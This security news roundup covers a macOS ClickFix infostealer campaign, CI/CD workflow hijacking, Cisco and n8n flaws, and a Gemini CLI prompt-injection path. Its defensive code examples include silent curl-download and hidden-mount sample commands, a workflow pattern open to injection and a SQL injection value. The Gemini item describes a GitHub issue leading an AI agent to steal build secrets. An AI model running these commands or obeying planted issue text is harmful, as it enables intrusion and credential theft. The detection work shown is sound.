Trending Topics
New macOS ClickFix Campaign Silently Mounts DMGs To Deliver AMOS Infostealer
A new macOS ClickFix campaign is abusing Terminal commands to silently download and mount malicious disk images, delivering the Atomic macOS Stealer without the visual cues users typically rely on to spot trouble. Attackers start with a fake CAPTCHA page claiming users must verify themselves to continue, then instruct them to open Terminal and paste a single command.
Once executed, that command uses curl with quiet flags to pull a DMG from an attacker-controlled server, saves it to the /tmp directory with a random filename, then calls macOS hdiutil with the -nobrowse option so the disk image mounts without appearing in Finder or on the desktop. The script then locates an embedded app bundle on the mounted image and launches it - all without obvious user interface prompts, making this flow particularly dangerous for non-technical Mac users.
The payload is AMOS, an infostealer tailored for macOS that targets browser credentials, cryptocurrency wallets, Keychain data, messaging apps, and local documents. Recent research has also noted its ability to swap legitimate crypto applications with trojanized versions to hijack transactions.
This campaign reflects a broader evolution of ClickFix, in which social engineering tricks convince victims to run commands themselves - neatly sidestepping traditional exploit-based delivery and certain built-in protections.
For defenders, the key takeaways are straightforward: educate users never to paste commands from untrusted web pages, tighten detection for curl and hdiutil activity originating from user-initiated shells, and monitor for connections to known malicious infrastructure including svs-verificationdate[.]beer and 196.251.107[.]171.
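The curl-then-hdiutil sequence described above can be correlated in process telemetry. The following is an added example, not code from the original report; the event tuple layout, the 120-second window and the sample events are assumptions constructed for illustration.

```python
import shlex

SHELLS = {"zsh", "bash", "sh"}  # shells a Terminal session normally runs
WINDOW_SECONDS = 120            # assumed correlation window

# Constructed sample telemetry: (timestamp, parent name, parent pid, command line)
SAMPLE_EVENTS = [
    (100, "zsh", 811, "curl -fsSL https://example.invalid/a -o /tmp/x7Qp2.dmg"),
    (103, "zsh", 811, "hdiutil attach -nobrowse -quiet /tmp/x7Qp2.dmg"),
    (200, "zsh", 902, "curl -O https://example.invalid/installer.dmg"),
    (260, "Finder", 340, "hdiutil attach -nobrowse /tmp/x7Qp2.dmg"),
]

def quiet_curl_output(argv):
    """Return the /tmp path a silent curl download writes to, else None."""
    if not argv or argv[0].rsplit("/", 1)[-1] != "curl":
        return None
    is_short = lambda a: a.startswith("-") and not a.startswith("--")
    silent = "--silent" in argv or any(is_short(a) and "s" in a for a in argv)
    out = None
    for flag, value in zip(argv, argv[1:]):
        if flag == "--output" or (is_short(flag) and flag.endswith("o")):
            out = value
    in_tmp = bool(out) and out.startswith(("/tmp/", "/private/tmp/"))
    return out if silent and in_tmp else None

def hidden_mount_images(argv):
    """Return candidate image paths of `hdiutil attach ... -nobrowse`."""
    if len(argv) < 2 or argv[0].rsplit("/", 1)[-1] != "hdiutil":
        return []
    if argv[1] != "attach" or "-nobrowse" not in argv:
        return []
    return [a for a in argv[2:] if not a.startswith("-")]

def detect(events):
    """Alert when a shell's quiet /tmp download is then mounted with -nobrowse."""
    downloads, alerts = {}, []   # (shell pid, path) -> download time
    for ts, parent, ppid, cmdline in sorted(events):
        if parent not in SHELLS:
            continue
        argv = shlex.split(cmdline)
        path = quiet_curl_output(argv)
        if path:
            downloads[(ppid, path)] = ts
        for image in hidden_mount_images(argv):
            seen = downloads.get((ppid, image))
            if seen is not None and ts - seen <= WINDOW_SECONDS:
                alerts.append({"ppid": ppid, "image": image, "delay": ts - seen})
    return alerts
```

Matching on the downloaded path rather than a .dmg extension matters here, because the campaign saves the image under a random filename.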
Cordyceps CI/CD Flaws Expose Millions Of Repos To Silent Hijacking
A new class of CI/CD vulnerabilities dubbed Cordyceps is exposing millions of open source repositories to hijacking by unauthenticated attackers who can take over build pipelines and developer workflows at scale. According to research from Novee, insecure patterns generated and copied by agentic coding tools have propagated flawed GitHub Actions workflows across thousands of projects, turning YAML configuration into a critical attack surface.
These workflows frequently chain low-privilege triggers - such as untrusted pull requests or issue comments - into high-privilege jobs that run shell commands, authenticate to cloud providers, handle signing keys, and publish releases. Because .yml files are typically treated as simple configuration and largely ignored by traditional scanners, they can hide command injection, artifact poisoning, and privilege escalation paths in plain sight, exploitable by any attacker with a free account and no special organization role.
Novee's scan identified 654 repositories with Cordyceps patterns and confirmed more than 300 as fully exploitable, including widely used tooling from Microsoft, Google, Apache, Cloudflare, and the Python Software Foundation. The downstream consequences include supply chain compromise via malicious packages pushed to npm, PyPI, Crates.io, Docker, and GHCR registries; tampered releases; stolen cloud credentials for AWS, GCP, and Netlify; compromised self-hosted runners; and bot impersonation within project workflows.
For security teams, the immediate priority is to treat CI/CD YAML as security-critical code. That means auditing Actions workflows for unsafe patterns, locking down who can trigger high-privilege jobs, and adding monitoring around suspicious pull requests or comments that could serve as the first step in a Cordyceps-style pipeline hijack.
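One audit of the kind described above, as an added example that is not Novee's tooling: it flags workflows where an externally triggerable event feeds author-controlled text straight into a run: script. The trigger shortlist, the expression pattern and the sample workflow are assumptions chosen for illustration and do not enumerate the Cordyceps patterns themselves.

```python
import re

# Events any GitHub account can fire on a public repo (assumed shortlist).
UNTRUSTED = re.compile(r"\b(pull_request_target|issue_comment|issues)\b")
# Expressions whose text is written by whoever opened the PR, issue or comment.
TAINTED = re.compile(
    r"\$\{\{\s*(github\.event\.[\w.]+\.(?:title|body|ref|label)|github\.head_ref)\s*\}\}")
RUN_KEY = re.compile(r"^(\s*(?:-\s+)?)run:\s*(.*)$")

# Constructed sample: the first step expands the comment body inside the
# script; the second passes the same value through an environment variable.
SAMPLE = """\
on:
  issue_comment:
jobs:
  triage:
    runs-on: ubuntu-latest
    steps:
      - run: |
          echo "Comment: ${{ github.event.comment.body }}"
      - env:
          BODY: ${{ github.event.comment.body }}
        run: echo "Comment: $BODY"
"""

def untrusted_triggers(text):
    """Names of externally triggerable events in the top-level `on:` block."""
    block = re.search(r"(?m)^on\s*:.*(?:\n(?:[ #].*)?)*", text)
    return set(UNTRUSTED.findall(block.group(0))) if block else set()

def audit_workflow(text):
    """Return (line number, expression) for tainted values expanded in run: scripts."""
    if not untrusted_triggers(text):
        return []
    findings, key_col = [], None
    for no, line in enumerate(text.splitlines(), 1):
        m = RUN_KEY.match(line)
        if m:
            key_col, body = len(m.group(1)), m.group(2)
        elif key_col is not None and (
                not line.strip() or len(line) - len(line.lstrip()) > key_col):
            body = line                        # continuation of a multi-line script
        else:
            key_col = None
            continue
        findings += [(no, expr) for expr in TAINTED.findall(body)]
    return findings
```

Only the first step of the sample is reported: the second binds the value to an environment variable, so the shell receives it as data rather than as script text.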
Update: Cisco Unified CM SSRF Flaw CVE-2026-20230 Now Actively Exploited
Cisco's critical Unified Communications Manager vulnerability CVE-2026-20230 has moved from theoretical risk to active exploitation, with attackers now targeting voice and collaboration infrastructure in real-world attacks. The flaw affects Cisco Unified Communications Manager and Unified CM Session Management Edition, stemming from improper input validation in HTTP requests handled by the WebDialer service. By sending crafted requests, an unauthenticated remote attacker can abuse server-side request forgery to force the system to write arbitrary files to the underlying operating system - creating a foothold for privilege escalation to root.
Cisco originally rated the CVSS score at 8.6 but classified the advisory as Critical because successful exploitation ultimately delivers full root-level control over a core communications platform widely used for enterprise telephony and call routing. Exploitation requires WebDialer to be enabled, which is off by default, but many deployments have turned it on to support click-to-call features - leaving them exposed.
Proof-of-concept exploit code has already been released, and recent reporting confirms that threat actors have begun weaponizing it against unpatched systems. Organizations running version 14 should urgently apply 14SU6. Version 15 customers must deploy Cisco's interim COP patch or disable WebDialer until the full 15SU5 service update arrives. Any delay leaves a path open for a single HTTP request to compromise the root of a mission-critical communications stack.
SQL Injection in n8n Gives Workflow Users Direct Access to Production Databases
CVE-2026-56351 is a SQL injection vulnerability in n8n versions prior to 2.4.0 that allows any authenticated user with workflow creation privileges to execute unauthorized commands against connected MySQL, PostgreSQL, and Microsoft SQL databases. The platform fails to sanitize table and column names entered during workflow configuration, allowing an attacker to embed malicious database commands in what appears to be a normal input field. The database receives it, treats it as a legitimate instruction, and executes it.
No administrative access is required. A standard workflow account is enough to read sensitive records, alter data, or delete entire databases that n8n is authorized to touch. Any instance connected to a PostgreSQL or SQL Server environment holds persistent credentials for that database and runs with whatever permissions were configured for the integration - which in many deployments is broader than it should be.
This is the second significant vulnerability to affect n8n in under a year. CVE-2025-68613, disclosed last year, exposed over 103,000 publicly accessible n8n instances to full server takeover. No active exploits or APT activity have been linked to CVE-2026-56351 yet, but SQL injection techniques are freely documented, require minimal authentication, and have widely available tooling to automate attacks. The window between disclosure and exploitation tends to be short.
Updating to n8n 2.4.0 or later closes the vulnerability. While that update is being staged, organizations should immediately audit who holds workflow creation privileges and revoke access for any account that does not require it. Any n8n instance directly accessible from the internet should be treated as a priority remediation target. A pending patch is not a reason to delay tightening access controls.
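The unsanitized table and column names described above are a class of input that bound query parameters cannot protect, because identifiers are part of the SQL text itself. This added example is not n8n's code; it uses Python's sqlite3 as a stand-in for the affected databases, with constructed data and hypothetical function names, to show the vulnerable shape beside a schema-allowlist check.

```python
import sqlite3

def build_select_unsafe(table, column):
    # Vulnerable shape: identifiers from a form field become part of the SQL text.
    return f"SELECT {column} FROM {table}"

def quote_ident(name):
    """Quote an identifier for SQLite/PostgreSQL by doubling embedded quotes."""
    return '"' + name.replace('"', '""') + '"'

def schema_allowlist(conn):
    """Map every real table to the set of its real column names."""
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'")]
    return {t: {r[1] for r in conn.execute(f"PRAGMA table_info({quote_ident(t)})")}
            for t in tables}

def build_select_safe(conn, table, column):
    """Accept only identifiers that exist in the schema, then quote them."""
    schema = schema_allowlist(conn)
    if column not in schema.get(table, ()):
        raise ValueError(f"rejected identifier: {table!r}.{column!r}")
    return f"SELECT {quote_ident(column)} FROM {quote_ident(table)}"

def demo():
    """Run both builders against a constructed in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE orders(id INTEGER, total REAL);
        CREATE TABLE api_keys(secret TEXT);
        INSERT INTO orders VALUES (1, 9.5);
        INSERT INTO api_keys VALUES ('constructed-secret');
    """)
    # Constructed "column name" field value that carries extra SQL.
    column = "secret FROM api_keys --"
    leaked = conn.execute(build_select_unsafe("orders", column)).fetchall()
    try:
        build_select_safe(conn, "orders", column)
        rejected = False
    except ValueError:
        rejected = True
    normal = conn.execute(build_select_safe(conn, "orders", "total")).fetchall()
    return leaked, rejected, normal
```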
Google Gemini CLI Flaw Gave Attackers a Path From a GitHub Issue to Full Repository Control
CVE-2026-12537 is an improper input validation vulnerability in Google Gemini CLI versions prior to 0.39.1. The flaw allowed an unprivileged external attacker to force malicious content to load as the Gemini configuration, triggering command execution directly on the host system before the agent's sandbox even initialized.
The mechanism is a maliciously crafted .gemini/.env file whose embedded commands the CLI accepts without question, treating attacker-controlled content as trusted configuration. That content loads silently as an agent configuration and executes on the host before any defensive layer is triggered. Despite an initially unassigned CVSS score, Google's internal assessment rated the vulnerability a 10.0 - reflecting low complexity, minimal privilege requirements, and no user interaction needed to exploit it.
In practice, an attacker could exploit this by creating a public GitHub issue with malicious prompts embedded in the text. Any AI agent automatically triaging that issue would load the attacker's content, extract internal secrets from the build environment, and send them to attacker-controlled infrastructure. Pillar Security researcher Dan Lisichkin, who co-discovered the vulnerability, described this as the "lethal trifecta": access to private data, exposure to untrusted content, and the ability to communicate externally - all present in the same attack path.
Google has published a security advisory patching both the run-gemini-cli action in version 0.1.22 and Gemini CLI in versions 0.39.1 and 0.40.0-preview.3. The fix enforces a tool allowlist and adds shell command sanitization, with updated best practices and example workflow templates.
Beyond patching, developers should set persist-credentials: false in their GitHub settings to keep tokens off disk, removing the credential storage that enables post-exploitation pivoting.
An AI agent running in a build environment with access to secrets, repositories, and external communication is not just an assistant. In the wrong configuration, it is an attack surface with administrative reach.
Written By: William Elchert